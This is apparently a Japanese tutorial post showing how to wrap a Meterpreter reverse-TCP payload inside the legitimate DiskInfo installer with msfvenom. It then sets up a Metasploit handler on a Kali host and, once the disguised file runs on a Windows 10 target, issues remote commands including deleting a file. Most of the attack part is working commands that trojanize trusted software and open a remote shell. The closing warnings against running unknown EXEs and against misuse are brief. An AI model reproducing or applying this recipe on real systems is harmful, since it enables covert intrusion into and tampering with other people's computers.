環境
何がしたい
KaliLinuxで作成したペイロードをターゲット側で実行し、侵入が可能なのか試したい
条件
- ターゲットはセキュリティソフトをオフにしている
- ターゲット側でペイロードを実行する必要がある
方法
ペイロードの作成
1. 偽装するためのexeファイル準備
そのままペイロードを作成すると芸がないので、インターネットで入手できるexeファイルを元にしペイロードを作成します。
元となるexeファイルはなんでもいいですが、今回はdiskinfoというフリーソフトを元にしたいと思います。
2. 以下のコマンドを実行し、ペイロードを作成します。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.189 LPORT=5555 -x DiskInfo3.exe -f exe -o DiskInfo1.exe
オプションについて
p:使用するペイロード
LHOST:攻撃後接続先となるホストのIP(KaliLinuxのIP)
LPORT:攻撃後接続先となるポート番号
x:ペイロード作成時に元となるファイル ※カレントディレクトリに置いてください
f:ファイル形式
o:出力ファイル名 ※xオプションで指定したファイルとは違う名前
3. Windows10(ターゲット)に2で作成したペイロードを移動
msfconsole
4. KaliLinuxで以下のコマンドを実行し、msfconsoleを起動する
msfconsole
※最初に出てくる絵はランダムなので上記と違っていても気にしないでください。
5. msfconsoleで以下のコマンドを実行し、使用するペイロードを選択
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.3.189
set LPORT 5555
run
※LHOSTとLPORTは2でペイロードを作成したときと同じ値にしてください
攻撃
作成したペイロードはアイコンも元のファイルと同じになっています。
実行時は何も起こらないので、ここでおかしいなと思われちゃうと思います。
7. KaliLinuxに戻ると攻撃が完了しています。
8. 攻撃対象のPCに接続できているか確認するためにいくつかコマンドを実行してみます。
getuid
dir
デスクトップに配置したDiskinfo1.exeがちゃんと見えています。
del "Microsoft Edge.lnk"
Edgeのショートカットが消えてしまいました
9. exitコマンドで接続を閉じます。
その他
ツールを使えば簡単にこのようなものが作れてしまいます。
Defenderのリアルタイムスキャンをオンにしていればすぐに削除されてしまいますが、危険なのは間違いないので
絶対にメールなどで送られてきたよくわからないEXEファイルは実行しないようにしましょう。
以下のようなサイトに作ったファイルをアップロードすると各社のセキュリティソフト(無料で配布されているもの)がアップロードしたファイルをウイルスと見なすかどうか確認することができます。
https://www.virustotal.com/gui/home/upload
今回作ったファイルをアップロードした結果
注意
あくまで脆弱性を試すためのテストなので悪用しないようにしてください。